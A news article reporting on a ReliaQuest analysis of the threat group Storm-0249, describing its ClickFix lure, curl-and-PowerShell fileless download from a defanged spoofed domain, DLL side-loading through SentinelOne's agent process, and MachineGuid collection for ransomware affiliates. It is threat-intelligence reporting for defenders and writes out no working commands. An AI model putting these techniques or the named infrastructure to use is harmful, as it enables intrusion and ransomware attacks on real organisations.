- The threat actor known as Storm-0249 is evolving from an initial access broker to a direct Ransomware attacker using advanced tactics.
- It employs domain spoofing, DLL side-loading, and fileless PowerShell execution to bypass security defenses and maintain persistent access.
- The group leverages social engineering methods like the ClickFix tactic and uses trusted Windows processes to avoid detection.
- Storm-0249 extracts unique system identifiers such as MachineGuid to prepare for targeted ransomware encryption strategies.
- These developments signal a shift toward precise, stealthy attacks to support ransomware affiliates such as LockBit and ALPHV.
The cyber threat group Storm-0249 is adopting new, sophisticated methods to conduct ransomware attacks as of December 2025. Previously recognized as an initial access broker providing network footholds to other cybercriminals, it now uses techniques including domain spoofing, DLL side-loading, and fileless PowerShell execution. These methods enable the group to infiltrate and persist in networks while evading detection. According to a ReliaQuest report shared with The Hacker News, this shift poses significant challenges for security teams.
Storm-0249, a name assigned by Microsoft, was first publicly identified in September 2024. It has facilitated access for ransomware and extortion groups like Storm-0501. In early 2025, Cybersecurity intelligence reported this group’s phishing campaigns targeted U.S. users with tax-themed messages, distributing malicious tools such as Latrodectus and the BruteRatel C4 (BRc4) post-exploitation framework.
The group now exploits the ClickFix social engineering tactic, convincing victims to execute malicious commands in the Windows Run dialog by posing as solving a technical problem. This method uses the legitimate Windows utility “curl.exe” to download a PowerShell script from a spoofed Microsoft-like domain (“sgcipl[.]com/us.microsoft.com/bdo/”). The PowerShell script then runs without leaving files on disk (fileless execution).
This attack results in installing a malicious MSI package that runs with SYSTEM privileges. It drops a trojanized DLL named “SentinelAgentCore.dll” alongside the legitimate “SentinelAgentWorker.exe” process of SentinelOne’s endpoint security software into the user’s AppData folder. When “SentinelAgentWorker.exe” runs, it loads the rogue DLL, enabling encrypted communication with a command-and-control (C2) server while remaining undetected.
Further, Storm-0249 uses legitimate Windows command-line tools like reg.exe and findstr.exe to retrieve unique system identifiers such as MachineGuid. This GUID is essential for ransomware execution because affiliates like LockBit and ALPHV bind encryption keys to these identifiers, ensuring decryption of files is only possible with attacker-controlled keys. ReliaQuest emphasized, “This isn’t just generic reconnaissance – it’s preparation for ransomware affiliates.”
These tactics represent a transition from broad phishing attempts toward targeted, stealthy attacks that abuse trusted signed processes, complicating detection and defense efforts.
✅ Follow BITNEWSBOT on Telegram, Facebook, LinkedIn, X.com, and Google News for instant updates.
Previous Articles:
- Crypto Apps Farcaster and EigenCloud Pivot After Vision Failures
- Polymarket Volume Double-Counted by Major Data Providers
- Circle Develops Privacy-Focused USDCx Stablecoin for Institutions
- GrayBravo’s CastleLoader Malware Expands Across Four Threat Clusters
- Solana Price Weakens as On-Chain Activity Hits New Lows
